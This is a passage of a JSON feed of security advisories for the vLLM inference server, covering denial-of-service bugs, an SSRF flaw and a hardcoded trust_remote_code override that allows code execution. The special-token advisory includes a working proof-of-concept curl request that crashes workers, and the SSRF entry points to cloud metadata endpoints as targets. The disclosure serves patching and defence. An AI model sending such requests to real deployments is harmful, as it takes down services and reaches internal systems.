vLLM.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-06T21:45:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw","https://github.com/vllm-project/vllm/pull/38610","https://nvd.nist.gov/vuln/detail/CVE-2026-44223","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-145.yaml","https://github.com/advisories/GHSA-83vm-p52w-f9pw"],"source_kind":"github","identifiers":["GHSA-83vm-p52w-f9pw","CVE-2026-44223"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-06T22:00:07.920Z","updated_at":"2026-10-02T15:03:43.183Z","epss_percentage":0.00426,"epss_percentile":0.34517,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04M3ZtLXA1MnctZjlwd84ABWWQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04M3ZtLXA1MnctZjlwd84ABWWQ","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.20.0","vulnerable_version_range":"\u003e= 0.18.0, \u003c 0.20.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04M3ZtLXA1MnctZjlwd84ABWWQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","url":"https://github.com/advisories/GHSA-hpv8-x276-m59f","title":"vLLM Vulnerable to Remote DoS via Special-Token Placeholders","description":"## Summary\nThis report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.\n\n## Details\n- Affected component: multimodal input position computation.\n- File/functions (paths are indicative):\n  - vllm/model_executor/layers/rotary_embedding.py\n    - get_input_positions_tensor(...)\n    - _vl_get_input_positions_tensor(...)\n- Failure mechanism:\n  - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.\n  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.\n\nRepresentative snippet (context):\n```python\n# vllm/model_executor/layers/rotary_embedding.py\n@classmethod\ndef _vl_get_input_positions_tensor(\n    cls,\n    input_tokens,\n    hf_config,\n    image_grid_thw,\n    video_grid_thw,\n    ...,\n):\n    # detect video tokens\n    video_nums = (vision_tokens == video_token_id).sum()\n    # later in processing\n    t, h, w = (\n        video_grid_thw[video_index][0],  # IndexError if no video data\n        video_grid_thw[video_index][1],\n        video_grid_thw[video_index][2],\n    )\n```\n\nAbbreviated call path:\n```\nOpenAI API request\n → vllm.v1.engine.core: step/execute_model\n → vllm.v1.worker.gpu_model_runner: _update_states/execute_model\n → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor\n → _vl_get_input_positions_tensor\n → IndexError: list index out of range\n```\n\n## PoC\n### Environment\n- vLLM: 0.10.0\n- Model: Qwen/Qwen2.5-VL-3B-Instruct\n- Launch server:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n  --model Qwen/Qwen2.5-VL-3B-Instruct \\\n  --port 8000\n```\n\n### Request (text-only, no image/video data)\n```bash\ncat \u003e request.json \u003c\u003c'JSON'\n{\n  \"model\": \"Qwen/Qwen2.5-VL-3B-Instruct\",\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": [\n        { \"type\": \"text\",\n          \"text\": \"what's in picture \u003c|vision_start|\u003e\u003c|image_pad|\u003e\u003c|vision_end|\u003e\" }\n      ]\n    }\n  ]\n}\nJSON\n\ncurl -s http://127.0.0.1:8000/v1/chat/completions \\\n  -H 'Content-Type: application/json' \\\n  --data @request.json\n```\n\n### Observed result\n- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).\n- In some deployments, the worker exits and capacity remains reduced until manual restart.\n\n## Impact\n- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.\n- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).\n- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.\n\n## Fixes\n\n* Changes associated with https://github.com/vllm-project/vllm/issues/32656\n\n## Credits\nPengyu Ding (Infra Security, Ant Group)  \nZiteng Xu (Infra Security, Ant Group)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-05T22:21:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f","https://github.com/vllm-project/vllm/issues/32656","https://nvd.nist.gov/vuln/detail/CVE-2026-44222","https://github.com/advisories/GHSA-hpv8-x276-m59f","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-3409.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-hpv8-x276-m59f","CVE-2026-44222"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-05T23:00:08.441Z","updated_at":"2026-09-25T12:04:01.471Z","epss_percentage":0.00455,"epss_percentile":0.36763,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.20.0","vulnerable_version_range":"\u003e= 0.6.1, \u003c 0.20.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14MzY4LTRnOWgtZnZ2NM4ABV1i","url":"https://github.com/advisories/GHSA-x368-4g9h-fvv4","title":"vLLM makes Use of Uninitialized Resource","description":"A vulnerability was found in vLLM up to 0.19.0. The affected element is the function has_mamba_layers of the file vllm/v1/kv_cache_interface.py of the component KV Block Handler. Performing a manipulation results in uninitialized resource. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is described as difficult. The exploit has been made public and could be used. The patch is named 1ad67864c0c20f167929e64c875f5c28e1aad9fd. To fix this issue, it is recommended to deploy a patch.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-04-27T18:32:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":2.9,"cvss_vector":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P","references":["https://nvd.nist.gov/vuln/detail/CVE-2026-7141","https://github.com/vllm-project/vllm/issues/39146","https://github.com/vllm-project/vllm/issues/39146#issue-4215090365","https://github.com/vllm-project/vllm/pull/39283","https://github.com/AjAnubolu/vllm/commit/1ad67864c0c20f167929e64c875f5c28e1aad9fd","https://vuldb.com/submit/801297","https://vuldb.com/vuln/359740","https://vuldb.com/vuln/359740/cti","https://github.com/advisories/GHSA-x368-4g9h-fvv4"],"source_kind":"github","identifiers":["GHSA-x368-4g9h-fvv4","CVE-2026-7141"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-06T18:00:09.102Z","updated_at":"2026-09-25T12:04:01.463Z","epss_percentage":0.00478,"epss_percentile":0.3855,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MzY4LTRnOWgtZnZ2NM4ABV1i","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14MzY4LTRnOWgtZnZ2NM4ABV1i","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.19.1","vulnerable_version_range":"\u003c 0.19.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MzY4LTRnOWgtZnZ2NM4ABV1i/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wcTVjLXJqaHEtcXA3cM4ABUtx","url":"https://github.com/advisories/GHSA-pq5c-rjhq-qp7p","title":"vLLM: Denial of Service via Unbounded Frame Count in video/jpeg Base64 Processing","description":"## Summary\n\nThe `VideoMediaIO.load_base64()` method at `vllm/multimodal/media/video.py:51-62` splits `video/jpeg` data URLs by comma to extract individual JPEG frames, but does not enforce a frame count limit. The `num_frames` parameter (default: 32), which is enforced by the `load_bytes()` code path at line 47-48, is completely bypassed in the `video/jpeg` base64 path. An attacker can send a single API request containing thousands of comma-separated base64-encoded JPEG frames, causing the server to decode all frames into memory and crash with OOM.\n\n## Details\n\n### Vulnerable code\n\n```python\n# video.py:51-62\ndef load_base64(self, media_type: str, data: str) -\u003e tuple[npt.NDArray, dict[str, Any]]:\n    if media_type.lower() == \"video/jpeg\":\n        load_frame = partial(self.image_io.load_base64, \"image/jpeg\")\n        return np.stack(\n            [np.asarray(load_frame(frame_data)) for frame_data in data.split(\",\")]\n            #                                                       ^^^^^^^^^^\n            # Unbounded split — no frame count limit\n        ), {}\n    return self.load_bytes(base64.b64decode(data))\n```\n\nThe `load_bytes()` path (line 47-48) properly delegates to a video loader that respects `self.num_frames` (default 32). The `load_base64(\"video/jpeg\", ...)` path bypasses this limit entirely — `data.split(\",\")` produces an unbounded list and every frame is decoded into a numpy array.\n\n### video/jpeg is part of vLLM's public API\n\n`video/jpeg` is a vLLM-specific MIME type, not IANA-registered. However it is part of the public API surface:\n\n- `encode_video_url()` at `vllm/multimodal/utils.py:96-108` generates `data:video/jpeg;base64,...` URLs\n- Official test suites at `tests/entrypoints/openai/test_video.py:62` and `tests/entrypoints/test_chat_utils.py:153` both use this format\n\n### Memory amplification\n\nEach JPEG frame decodes to a full numpy array. For 640x480 RGB images, each frame is ~921 KB decoded. 5000 frames = ~4.6 GB. `np.stack()` then creates an additional copy. The compressed JPEG payload is small (~100 KB for 5000 frames) but decompresses to gigabytes.\n\n### Data flow\n\n```\nPOST /v1/chat/completions\n  → chat_utils.py:1434   video_url type → mm_parser.parse_video()\n  → chat_utils.py:872    parse_video() → self._connector.fetch_video()\n  → connector.py:295     fetch_video() → load_from_url(url, self.video_io)\n  → connector.py:91      _load_data_url(): url_spec.path.split(\",\", 1)\n                          → media_type = \"video/jpeg\"\n                          → data = \"\u003cframe1\u003e,\u003cframe2\u003e,...,\u003cframe10000\u003e\"\n  → connector.py:100     media_io.load_base64(\"video/jpeg\", data)\n  → video.py:54          data.split(\",\")  ← UNBOUNDED\n  → video.py:55-57       all frames decoded into numpy arrays\n  → video.py:56          np.stack([...])  ← massive combined array → OOM\n```\n\n`connector.py:91` uses `split(\",\", 1)` which splits on only the first comma. All remaining commas stay in `data` and are later split by `video.py:54`.\n\n### Comparison with existing protections\n\n| Code Path | Frame Limit | File |\n|-----------|-------------|------|\n| `load_bytes()` (binary video) | Yes — `num_frames` (default 32) | video.py:46-49 |\n| `load_base64(\"video/jpeg\", ...)` | No — unlimited `data.split(\",\")` | video.py:51-62 |","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-03T21:51:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-pq5c-rjhq-qp7p","https://github.com/vllm-project/vllm/pull/38636","https://github.com/vllm-project/vllm/commit/58ee61422169ce17e08248f8efa1e9df434fe395","https://nvd.nist.gov/vuln/detail/CVE-2026-34755","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-144.yaml","https://access.redhat.com/errata/RHSA-2026:36005","https://access.redhat.com/errata/RHSA-2026:36006","https://access.redhat.com/security/cve/CVE-2026-34755","https://bugzilla.redhat.com/show_bug.cgi?id=2455403","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-34755.json","https://access.redhat.com/errata/RHSA-2026:57380","https://access.redhat.com/errata/RHSA-2026:57390","https://access.redhat.com/errata/RHSA-2026:57387","https://access.redhat.com/errata/RHSA-2026:57389","https://access.redhat.com/errata/RHSA-2026:59144","https://access.redhat.com/errata/RHSA-2026:59151","https://github.com/advisories/GHSA-pq5c-rjhq-qp7p"],"source_kind":"github","identifiers":["GHSA-pq5c-rjhq-qp7p","CVE-2026-34755"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-03T22:00:13.847Z","updated_at":"2026-09-25T12:04:44.674Z","epss_percentage":0.00843,"epss_percentile":0.5611,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcTVjLXJqaHEtcXA3cM4ABUtx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wcTVjLXJqaHEtcXA3cM4ABUtx","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.19.0","vulnerable_version_range":"\u003e= 0.7.0, \u003c 0.19.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcTVjLXJqaHEtcXA3cM4ABUtx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wZjNoLXFqZ3YtdmNwcs4ABUtw","url":"https://github.com/advisories/GHSA-pf3h-qjgv-vcpr","title":"vLLM: Server-Side Request Forgery (SSRF) in `download_bytes_from_url `","description":"### Summary\n\nA Server Side Request Forgery (SSRF) vulnerability in `download_bytes_from_url` allows any actor who can control batch input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS requests from the server, without any URL validation or domain restrictions.\n\nThis can be used to target internal services (e.g. cloud metadata endpoints or internal HTTP APIs) reachable from the vLLM host.\n\n------\n\n### Details\n\n#### Vulnerable component\n\nThe vulnerable logic is in the batch runner entrypoint `vllm/entrypoints/openai/run_batch.py`, function `download_bytes_from_url`:\n\n```\n# run_batch.py Lines 442-482\nasync def download_bytes_from_url(url: str) -\u003e bytes:\n    \"\"\"\n    Download data from a URL or decode from a data URL.\n\n    Args:\n        url: Either an HTTP/HTTPS URL or a data URL (data:...;base64,...)\n\n    Returns:\n        Data as bytes\n    \"\"\"\n    parsed = urlparse(url)\n\n    # Handle data URLs (base64 encoded)\n    if parsed.scheme == \"data\":\n        # Format: data:...;base64,\u003cbase64_data\u003e\n        if \",\" in url:\n            header, data = url.split(\",\", 1)\n            if \"base64\" in header:\n                return base64.b64decode(data)\n            else:\n                raise ValueError(f\"Unsupported data URL encoding: {header}\")\n        else:\n            raise ValueError(f\"Invalid data URL format: {url}\")\n\n    # Handle HTTP/HTTPS URLs\n    elif parsed.scheme in (\"http\", \"https\"):\n        async with (\n            aiohttp.ClientSession() as session,\n            session.get(url) as resp,\n        ):\n            if resp.status != 200:\n                raise Exception(\n                    f\"Failed to download data from URL: {url}. Status: {resp.status}\"\n                )\n            return await resp.read()\n\n    else:\n        raise ValueError(\n            f\"Unsupported URL scheme: {parsed.scheme}. \"\n            \"Supported schemes: http, https, data\"\n        )\n```\n\nKey properties:\n\n- The function only parses the URL to dispatch on the scheme (`data`, `http`, `https`).\n- For `http` / `https`, it directly calls `session.get(url)` on the provided string.\n- There is no validation of:\n  - hostname or IP address,\n  - whether the target is internal or external,\n  - port number,\n  - path, query, or redirect target.\n- This is in contrast to the multimodal media path (`MediaConnector`), which implements an explicit domain allowlist. `download_bytes_from_url` does not reuse that protection.\n\n#### URL controllability\n\nThe `url` argument is fully controlled by batch input JSON via the `file_url` field of `BatchTranscriptionRequest` / `BatchTranslationRequest`.\n\n1. Batch request body type:\n\n```\n# run_batch.py Line 67-80\nclass BatchTranscriptionRequest(TranscriptionRequest):\n    \"\"\"\n    Batch transcription request that uses file_url instead of file.\n\n    This class extends TranscriptionRequest but replaces the file field\n    with file_url to support batch processing from audio files written in JSON format.\n    \"\"\"\n\n    file_url: str = Field(\n        ...,\n        description=(\n            \"Either a URL of the audio or a data URL with base64 encoded audio data. \"\n        ),\n    )\n```\n\n```\n# run_batch.py Line 98-111\nclass BatchTranslationRequest(TranslationRequest):\n    \"\"\"\n    Batch translation request that uses file_url instead of file.\n\n    This class extends TranslationRequest but replaces the file field\n    with file_url to support batch processing from audio files written in JSON format.\n    \"\"\"\n\n    file_url: str = Field(\n        ...,\n        description=(\n            \"Either a URL of the audio or a data URL with base64 encoded audio data. \"\n        ),\n    )\n```\n\nThere is no restriction on the domain, IP, or port of `file_url` in these models.\n\n1. Batch input is parsed directly from the batch file:\n\n```\n# run_batch.py Line 139-179\nclass BatchRequestInput(OpenAIBaseModel):\n    ...\n    url: str\n    body: BatchRequestInputBody\n    @field_validator(\"body\", mode=\"plain\")\n    @classmethod\n    def check_type_for_url(cls, value: Any, info: ValidationInfo):\n        url: str = info.data[\"url\"]\n        ...\n        if url == \"/v1/audio/transcriptions\":\n            return BatchTranscriptionRequest.model_validate(value)\n        if url == \"/v1/audio/translations\":\n            return BatchTranslationRequest.model_validate(value)\n```\n\n```\n# run_batch.py Line 770-781\n   logger.info(\"Reading batch from %s...\", args.input_file)\n\n    # Submit all requests in the file to the engine \"concurrently\".\n    response_futures: list[Awaitable[BatchRequestOutput]] = []\n    for request_json in (await read_file(args.input_file)).strip().split(\"\\n\"):\n        # Skip empty lines.\n        request_json = request_json.strip()\n        if not request_json:\n            continue\n\n        request = BatchRequestInput.model_validate_json(request_json)\n```\n\nThe batch runner reads each line of the input file (`args.input_file`), parses it as JSON, and constructs a `BatchTranscriptionRequest` / `BatchTranslationRequest`. Whatever `file_url` appears in that JSON line becomes `batch_request_body.file_url`.\n\n1. `file_url` is passed directly into `download_bytes_from_url`:\n\n```\n# run_batch.py Line 610-623\ndef wrapper(handler_fn: Callable):\n        async def transcription_wrapper(\n            batch_request_body: (BatchTranscriptionRequest | BatchTranslationRequest),\n        ) -\u003e (\n            TranscriptionResponse\n            | TranscriptionResponseVerbose\n            | TranslationResponse\n            | TranslationResponseVerbose\n            | ErrorResponse\n        ):\n            try:\n                # Download data from URL\n                audio_data = await download_bytes_from_url(batch_request_body.file_url)\n```\n\nSo the data flow is:\n\n1. Attacker supplies JSON line in the batch input file with arbitrary `body.file_url`.\n2. `BatchRequestInput` / `BatchTranscriptionRequest` / `BatchTranslationRequest` parse that JSON and store `file_url` verbatim.\n3. `make_transcription_wrapper` calls `download_bytes_from_url(batch_request_body.file_url)`.\n4. `download_bytes_from_url`’s HTTP/HTTPS branch issues `aiohttp.ClientSession().get(url)` to that attacker-controlled URL with no further validation.\n\nThis is a classic SSRF pattern: a server-side component makes arbitrary HTTP requests to a URL string taken from untrusted input.\n\n#### Comparison with safer code\n\nThe project already contains a safer URL-handling path for multimodal media in `vllm/multimodal/media/connector.py`, which demonstrates the intent to mitigate SSRF via domain allowlists and URL normalization:\n\n```\n# connector.py Lines 169-189\n def load_from_url(\n        self,\n        url: str,\n        media_io: MediaIO[_M],\n        *,\n        fetch_timeout: int | None = None,\n    ) -\u003e _M:  # type: ignore[type-var]\n        url_spec = parse_url(url)\n\n        if url_spec.scheme and url_spec.scheme.startswith(\"http\"):\n            self._assert_url_in_allowed_media_domains(url_spec)\n\n            connection = self.connection\n            data = connection.get_bytes(\n                url_spec.url,\n                timeout=fetch_timeout,\n                allow_redirects=envs.VLLM_MEDIA_URL_ALLOW_REDIRECTS,\n            )\n\n            return media_io.load_bytes(data)\n```\n\nand:\n\n```\n# connector.py Lines 158-167\n  def _assert_url_in_allowed_media_domains(self, url_spec: Url) -\u003e None:\n        if (\n            self.allowed_media_domains\n            and url_spec.hostname not in self.allowed_media_domains\n        ):\n            raise ValueError(\n                f\"The URL must be from one of the allowed domains: \"\n                f\"{self.allowed_media_domains}. Input URL domain: \"\n                f\"{url_spec.hostname}\"\n            )\n```\n\n`download_bytes_from_url` does not reuse this allowlist or any equivalent validation, even though it also fetches user-provided URLs.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-03T21:51:00.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-pf3h-qjgv-vcpr","https://github.com/vllm-project/vllm/pull/38482","https://github.com/vllm-project/vllm/commit/57861ae48d3493fa48b4d7d830b7ec9f995783e7","https://nvd.nist.gov/vuln/detail/CVE-2026-34753","https://github.com/advisories/GHSA-pf3h-qjgv-vcpr","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-3410.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-pf3h-qjgv-vcpr","CVE-2026-34753"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-03T22:00:13.847Z","updated_at":"2026-09-25T12:04:44.675Z","epss_percentage":0.00305,"epss_percentile":0.20682,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wZjNoLXFqZ3YtdmNwcs4ABUtw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wZjNoLXFqZ3YtdmNwcs4ABUtw","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.19.0","vulnerable_version_range":"\u003e= 0.16.0, \u003c 0.19.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wZjNoLXFqZ3YtdmNwcs4ABUtw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zbXdwLXd2aDktNzUyOM4ABUr7","url":"https://github.com/advisories/GHSA-3mwp-wvh9-7528","title":"vLLM: Unauthenticated OOM Denial of Service via Unbounded `n` Parameter in OpenAI API Server","description":"### Summary\nA Denial of Service vulnerability exists in the vLLM OpenAI-compatible API server. Due to the lack of an upper bound validation on the `n` parameter in the `ChatCompletionRequest` and `CompletionRequest` Pydantic models, an unauthenticated attacker can send a single HTTP request with an astronomically large `n` value. This completely blocks the Python `asyncio` event loop and causes immediate Out-Of-Memory crashes by allocating millions of request object copies in the heap before the request even reaches the scheduling queue.\n\n### Details\nThe root cause of this vulnerability lies in the missing upper bound checks across the request parsing and asynchronous scheduling layers:\n\n1. **Protocol Layer:**\n   In `vllm/entrypoints/openai/chat_completion/protocol.py`, the `n` parameter is defined simply as an integer without any `pydantic.Field` constraints for an upper bound.\n```python\nclass ChatCompletionRequest(OpenAIBaseModel):\n    # Ordered by official OpenAI API documentation\n    # https://platform.openai.com/docs/api/reference/chat/create\n    messages: list[ChatCompletionMessageParam]\n    model: str | None = None\n    frequency_penalty: float | None = 0.0\n    logit_bias: dict[str, float] | None = None\n    logprobs: bool | None = False\n    top_logprobs: int | None = 0\n    max_tokens: int | None = Field(\n        default=None,\n        deprecated=\"max_tokens is deprecated in favor of \"\n        \"the max_completion_tokens field\",\n    )\n    max_completion_tokens: int | None = None\n    n: int | None = 1\n    presence_penalty: float | None = 0.0\n```\n\n1. **SamplingParams Layer (Incomplete Validation):**\n   When the API request is converted to internal `SamplingParams` in `vllm/sampling_params.py`, the `_verify_args` method only checks the lower bound (`self.n \u003c 1`), entirely omitting an upper bounds check.\n```python\n    def _verify_args(self) -\u003e None:\n        if not isinstance(self.n, int):\n            raise ValueError(f\"n must be an int, but is of type {type(self.n)}\")\n        if self.n \u003c 1:\n            raise ValueError(f\"n must be at least 1, got {self.n}.\")\n```\n\n1. **Engine Layer (The OOM Trigger):**\n   When the malicious request reaches the core engine (`vllm/v1/engine/async_llm.py`), the engine attempts to fan out the request `n` times to generate identical independent sequences within a synchronous loop.\n```python\n        # Fan out child requests (for n\u003e1).\n        parent_request = ParentRequest(request)\n        for idx in range(parent_params.n):\n            request_id, child_params = parent_request.get_child_info(idx)\n            child_request = request if idx == parent_params.n - 1 else copy(request)\n            child_request.request_id = request_id\n            child_request.sampling_params = child_params\n            await self._add_request(\n                child_request, prompt_text, parent_request, idx, queue\n            )\n        return queue\n```\n   Because Python's `asyncio` runs on a single thread and event loop, this monolithic `for`-loop monopolizes the CPU thread. The server stops responding to all other connections (including liveness probes). Simultaneously, the memory allocator is overwhelmed by cloning millions of request object instances via `copy(request)`, driving the host's Resident Set Size (RSS) up by gigabytes per second until the OS `OOM-killer` terminates the vLLM process.\n\n### Impact\n**Vulnerability Type:** Resource Exhaustion / Denial of Service\n\n**Impacted Parties:**\n- Any individual or organization hosting a public-facing vLLM API server (`vllm.entrypoints.openai.api_server`), which happens to be the primary entrypoint for OpenAI-compatible setups.\n- SaaS / AI-as-a-Service platforms acting as reverse proxies sitting in front of vLLM without strict HTTP body payload validation or rate limitations.\n\nBecause this vulnerability exploits the control plane rather than the data plane, an unauthenticated remote attacker can achieve a high success rate in taking down production inference hosts with a single HTTP request. This effectively circumvents any hardware-level capacity planning and conventional bandwidth stress limitations.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-03T15:35:48.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-3mwp-wvh9-7528","https://github.com/vllm-project/vllm/pull/37952","https://github.com/vllm-project/vllm/commit/b111f8a61f100fdca08706f41f29ef3548de7380","https://nvd.nist.gov/vuln/detail/CVE-2026-34756","https://access.redhat.com/errata/RHSA-2026:36005","https://access.redhat.com/errata/RHSA-2026:36006","https://access.redhat.com/security/cve/CVE-2026-34756","https://bugzilla.redhat.com/show_bug.cgi?id=2455425","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2298.yaml","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-34756.json","https://github.com/advisories/GHSA-3mwp-wvh9-7528"],"source_kind":"github","identifiers":["GHSA-3mwp-wvh9-7528","CVE-2026-34756"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-03T16:00:10.301Z","updated_at":"2026-09-25T12:04:44.683Z","epss_percentage":0.00766,"epss_percentile":0.53531,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zbXdwLXd2aDktNzUyOM4ABUr7","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zbXdwLXd2aDktNzUyOM4ABUr7","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.19.0","vulnerable_version_range":"\u003e= 0.1.0, \u003c 0.19.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zbXdwLXd2aDktNzUyOM4ABUr7/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03OTcyLXBnMngteHI1Oc4ABUXs","url":"https://github.com/advisories/GHSA-7972-pg2x-xr59","title":"vLLM has Hardcoded Trust Override in Model Files Enables RCE Despite Explicit User Opt-Out","description":"### Summary\n\n  Two model implementation files hardcode `trust_remote_code=True` when loading sub-components, bypassing the user's explicit `--trust-remote-code=False` security opt-out. This enables remote code execution via malicious model\n  repositories even when the user has explicitly disabled remote code trust.\n\n  ### Details\n\n  **Affected files (latest main branch):**\n\n  1. `vllm/model_executor/models/nemotron_vl.py:430`\n  ```python\n  vision_model = AutoModel.from_config(config.vision_config, trust_remote_code=True)\n```\n\n  2. vllm/model_executor/models/kimi_k25.py:177\n \n```python\n  cached_get_image_processor(self.ctx.model_config.model, trust_remote_code=True)\n```\n\n  Both pass a hardcoded trust_remote_code=True to HuggingFace API calls, overriding the user's global --trust-remote-code=False setting.\n\n  Relation to prior CVEs:\n  - CVE-2025-66448 fixed auto_map resolution in vllm/transformers_utils/config.py (config loading path)\n  - CVE-2026-22807 fixed broader auto_map at startup\n  - Both fixes are present in the current code. These hardcoded instances in model files survived both patches — different code paths.\n\n### Impact\n\n  Remote code execution. An attacker can craft a malicious model repository that executes arbitrary Python code when loaded by vLLM, even when the user has explicitly set --trust-remote-code=False. This undermines the security guarantee\n  that trust_remote_code=False is intended to provide.\n\n  Remediation: Replace hardcoded trust_remote_code=True with self.config.model_config.trust_remote_code in both files. Raise a clear error if the model component requires remote code but the user hasn't opted 